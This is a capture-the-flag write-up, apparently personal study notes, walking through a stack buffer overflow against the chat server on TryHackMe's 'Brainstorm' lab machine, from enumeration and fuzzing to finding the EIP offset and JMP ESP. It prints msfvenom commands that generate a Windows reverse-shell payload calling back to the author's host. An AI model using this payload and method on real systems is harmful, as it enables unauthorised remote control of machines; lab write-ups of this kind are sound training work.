# BRAINSTORM | 10.10.242.252 | TryHackMe

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.242.252

### Open Ports and Their Services

* 21 - FTP - Microsoft ftpd
* 3389 - RDP
* 9999 - Abyss? - "Brainstorm Chat Server"

## Service Enumeration

### 21 - FTP

This is a standard setup of an FTP server on a Windows machine. It allows anonymous login:

![](img/ftp-enum.png)

And there are interesting files in a directory - looks like the exe for the chat server running on port 9999 and a .dll file. Let's grab em:

![](img/ftp-files.png)

### 3389 - RDP

This is a port for remote desktop administration. Without valid creds this service is of no use. Let's move on.

### 9999 - Chat Server

This is a basic chat server. I connect to it using netcat and and prompts for a username of no more than 20 characters which makes me think of buffer overflows (ok not really, but obvi this box is about that).

![](img/chat-server.png)

## Reverse Engineering the Chat Program

First thing is I'm gonna try to do this entirely on Linux, which should be an adventure. So I have the exe and dll on my Kali machine, and I can get it running using Wine:

![](img/waiting.png)

I have some basic python scripts from a previous buffer overflow-based machine ([brainpan](https://tryhackme.com/room/brainpan)), so I'm going to use those to start testing the exe. The [first one](enum/01-fuzzer.py) requires me to send an initial input of username, but otherwise I don't have to change that much.

### Fuzzing the exe

After running the first fuzzing script, the server reports a problem but not necessarily a crash, but indicates a buffer filled with As, which means we overflowed it:

![](img/fuzz-crash-1.png)

Also, my script indicated that it "crashed" (actually I exited the server program) around 3000 bytes:

![](img/fuzz-crash-2.png)

### Finding EIP

Now, I want to confirm at exactly which point the crash occurs. The [second script](enum/02-fuzzer.py) has been modified to do just that. I've generated a nonrepeating sequence of characters using `msf-pattern_create`:

    msf-pattern_create -l 3000

and added that to the script. To do all of this on Linux, I need a program like Immunity Debugger for Windows, so I am using [edb Debugger](https://github.com/eteran/edb-debugger), an open-source app that has the same functions.

I start the chat server, then open edb and attach the process to it, press play. Then I run my script and go back to check out the response. I have to click the play button a couple times but I get what I am looking for - the EIP is filled with a sequence of hex characters:

![](img/EIP.png)

I take that sequence and query `msf-pattern_offset -l 3000 -q` and I get an exact match:

![](img/match.png)

So the crash point is at 2012 bytes. I want to confirm, so I will use [another simple script](enum/03-fuzzer.py). This one will send exactly 2012 As, and then 4 Bs, and if the EIP has '42424242' then I have successfully controlled the EIP.

![](img/BBBB.png)

Success!

### Determining Bad Characters

The next step is to determine if the program will behave strangely with any weird characters - if that is the case and my shellcode is composed of any of them, then it probably won't execute. To grab the badchars I just googled `badchars` and then pasted them in yet [another script](enum/04-badchars-test.py).

After I attach the exe in ollydbg (edb was having problems displaying the characters!) I right click on the ESP and select "follow in dump" which shows me where the badchars went. If there were any problems with any characters then they would not properly display - luckily that is not the case:

![](img/badchars.png)


### JMP ESP

Now the next step is tricky for me in Linux, but I'll give it a good try before resorting to my Windows box. I need to locate what is called a "JMP ESP", which as I understand it is an unconditional instruction to jump to the ESP register - which is where I will put my shellcode.

I have started the chat server and attached it to ollydbg, then I right-clicked on the top left window and selected "view > essfunc" - which is the other file (the dll) that goes with the chatserver. I had to reload the program in ollydbg in order to get this to work.

Then, with my focus on the top left window again, I hit "CTRL-F" to open a search window and I typed "jmp esp" and hit enter. It listed a whole bunch of JMP ESPs for me to choose. I chose the first one:

![](img/jmp-esp.png)

Then I hit "F2" to add a breakpoint there, so next time I throw junk at the program (in a moment), ollydbg will stop there for me.

![](img/essfunc.png)

I managed to hit upon it just fine. That's excellent! If we control the EIP we can tell it to run basically any code we want. One more step to go: testing the exploit.

### Testing the Exploit Locally

First things first - let's generate some shellcode. We'll use msfvenom and make it a C file.

    msfvenom -p windows/shell_reverse_tcp -b "\x00" LHOST=192.168.0.18 LPORT=6969 -f c

That will generate shellcode for a 32-bit reverse shell, avoiding the use of the one badchar that is universally bad. Then I just paste the code into the [test script](enum/06-bof-poc.py) as the buf variable.

Now, this will not work trying to run it on my Kali machine, even though I was able to do a lot of work here - the shellcode is calling a reverse shell as a cmd.exe prompt, which my Kali box can't do, so I will have to spin up a Windows box just to test it. Annoying.

I've got it all set up, and I run the exploit and amazingly I now have a shell on my own Windows box. Nice!

![](img/test-shell.png)

## Exploitation

That means I am ready to go. I just have to make sure that the shellcode has my VPN ip address and that it is targeting the IP of the remote server, rather than my local Windows machine.

    msfvenom -p windows/shell_reverse_tcp LHOST=10.2.0.130 LPORT=6969 -b "\x00" -f c

I commence the attack, and in a moment I am root:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

A real nice box highlighting a "simple" buffer overflow attack. This took me a few hours to be honest. Even though I had rooted brainpan - which is a similar box - I failed to take any notes, I only had the scripts to guide me. So this forced me to relearn it all, and it was fun. I am now a bit more confident I can tackle a box like this in the OSCP!

Steps taken:

* Notice chat program running on a port
* Find the exe to the program on the open FTP server; download it
* Reverse engineer the exe to determine it is vulnerable to a buffer overflow attack
* Develop exploit and launch it at the remote server, popping a root reverse shell
